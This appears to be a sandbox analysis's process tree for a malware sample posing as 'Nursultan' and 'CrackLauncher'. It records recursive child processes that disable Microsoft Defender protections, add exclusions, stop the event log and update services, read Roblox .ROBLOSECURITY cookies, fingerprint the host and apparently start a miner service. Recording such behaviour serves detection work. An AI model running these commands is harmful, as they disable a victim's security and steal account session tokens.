        18⤵
        Power Settings
        
        PID:4968
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        18⤵
        Power Settings
        
        PID:3432
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        18⤵
        Power Settings
        
        PID:2384
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        18⤵
        Launches sc.exe
        
        PID:3948
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "XMRKNZQC"
        18⤵
        
        PID:1976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3432
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        17⤵
        Executes dropped EXE
        
        PID:4944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        17⤵
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        17⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1320
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        18⤵
        
        PID:3320
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        17⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:4520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        18⤵
        
        PID:3140
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        18⤵
        Executes dropped EXE
        
        PID:3256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        18⤵
        
        PID:4640
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        18⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1268
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        19⤵
        Views/modifies file attributes
        
        PID:2968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        19⤵
        
        PID:5076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        19⤵
        
        PID:4808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        19⤵
        
        PID:2136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        19⤵
        
        PID:3920
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        19⤵
        
        PID:3660
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        19⤵
        
        PID:1320
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        19⤵
        
        PID:1984
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        20⤵
        
        PID:2912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        19⤵
        
        PID:4064
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        19⤵
        Detects videocard installed
        
        PID:3616
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        19⤵
        
        PID:1872
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        20⤵
        Runs ping.exe
        
        PID:772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        18⤵
        
        PID:4692
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        18⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:804
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        19⤵
        
        PID:2876
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        18⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:4276
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        19⤵
        
        PID:5076
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        19⤵
        Executes dropped EXE
        
        PID:4784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        19⤵
        
        PID:912
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        19⤵
        Executes dropped EXE
        
        PID:4480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5088
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        19⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3204
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        20⤵
        
        PID:3964
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        19⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4640
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        20⤵
        Executes dropped EXE
        
        PID:4964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        20⤵
        
        PID:1856
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        21⤵
        
        PID:4272
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        20⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2540
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        21⤵
        Views/modifies file attributes
        
        PID:4132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        21⤵
        
        PID:3752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        21⤵
        
        PID:1068
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        22⤵
        
        PID:772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        21⤵
        
        PID:3772
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        21⤵
        
        PID:4176
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        21⤵
        
        PID:4808
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        21⤵
        
        PID:2136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        21⤵
        
        PID:468
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        21⤵
        Detects videocard installed
        
        PID:4420
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        21⤵
        
        PID:5076
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        22⤵
        Runs ping.exe
        
        PID:4088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3968
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        20⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2968
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        21⤵
        
        PID:3924
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        21⤵
        
        PID:4640
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        20⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:3900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        21⤵
        
        PID:4036
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        21⤵
        Executes dropped EXE
        
        PID:4964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3204
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        21⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:5104
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        22⤵
        Views/modifies file attributes
        
        PID:468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        22⤵
        
        PID:2332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        22⤵
        
        PID:2388
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        23⤵
        
        PID:1156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        22⤵
        
        PID:1776
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        22⤵
        
        PID:1868
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        22⤵
        
        PID:1484
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        22⤵
        
        PID:3248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        22⤵
        
        PID:1052
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        22⤵
        Detects videocard installed
        
        PID:984
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        22⤵
        
        PID:3988
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        23⤵
        Runs ping.exe
        
        PID:3660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4772
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        21⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4556
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        22⤵
        
        PID:5008
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        21⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:2848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        22⤵
        
        PID:4356
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        22⤵
        Executes dropped EXE
        
        PID:5064
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        23⤵
        
        PID:1852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        23⤵
        
        PID:3900
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        24⤵
        
        PID:2220
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        23⤵
        Launches sc.exe
        
        PID:2872
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        23⤵
        Launches sc.exe
        
        PID:3832
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        24⤵
        
        PID:468
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        23⤵
        
        PID:1876
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        23⤵
        
        PID:2160
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        23⤵
        Launches sc.exe
        
        PID:3648
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        23⤵
        Power Settings
        
        PID:4988
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        23⤵
        Power Settings
        
        PID:4548
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        23⤵
        Power Settings
        
        PID:2588
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        24⤵
        
        PID:4356
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        23⤵
        Power Settings
        
        PID:2144
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        23⤵
        Launches sc.exe
        
        PID:3640
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "XMRKNZQC"
        23⤵
        Launches sc.exe
        
        PID:1244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4372
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        22⤵
        
        PID:912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        22⤵
        
        PID:2220
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        22⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:3248
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        23⤵
        
        PID:4528
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        22⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:3420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        23⤵
        
        PID:3976
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        23⤵
        
        PID:1876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        23⤵
        
        PID:1840
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        24⤵
        
        PID:3432
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        23⤵
        
        PID:4724
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        24⤵
        Views/modifies file attributes
        
        PID:3088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        24⤵
        
        PID:2432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        24⤵
        
        PID:2876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        24⤵
        
        PID:4960
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        24⤵
        
        PID:932
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        24⤵
        
        PID:1184
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        24⤵
        
        PID:4988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        24⤵
        
        PID:1840
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        24⤵
        Detects videocard installed
        
        PID:3960
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        24⤵
        
        PID:984
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        25⤵
        
        PID:912
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        25⤵
        Runs ping.exe
        
        PID:4016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4328
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        23⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:1184
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        24⤵
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        23⤵
        
        PID:5088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        24⤵
        
        PID:60
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        24⤵
        
        PID:3616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4260
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        25⤵
        
        PID:3752
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        24⤵
        
        PID:1948
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        25⤵
        Views/modifies file attributes
        
        PID:5048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        25⤵
        
        PID:1588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        25⤵
        
        PID:936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        25⤵
        
        PID:3488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        25⤵
        
        PID:4128
        
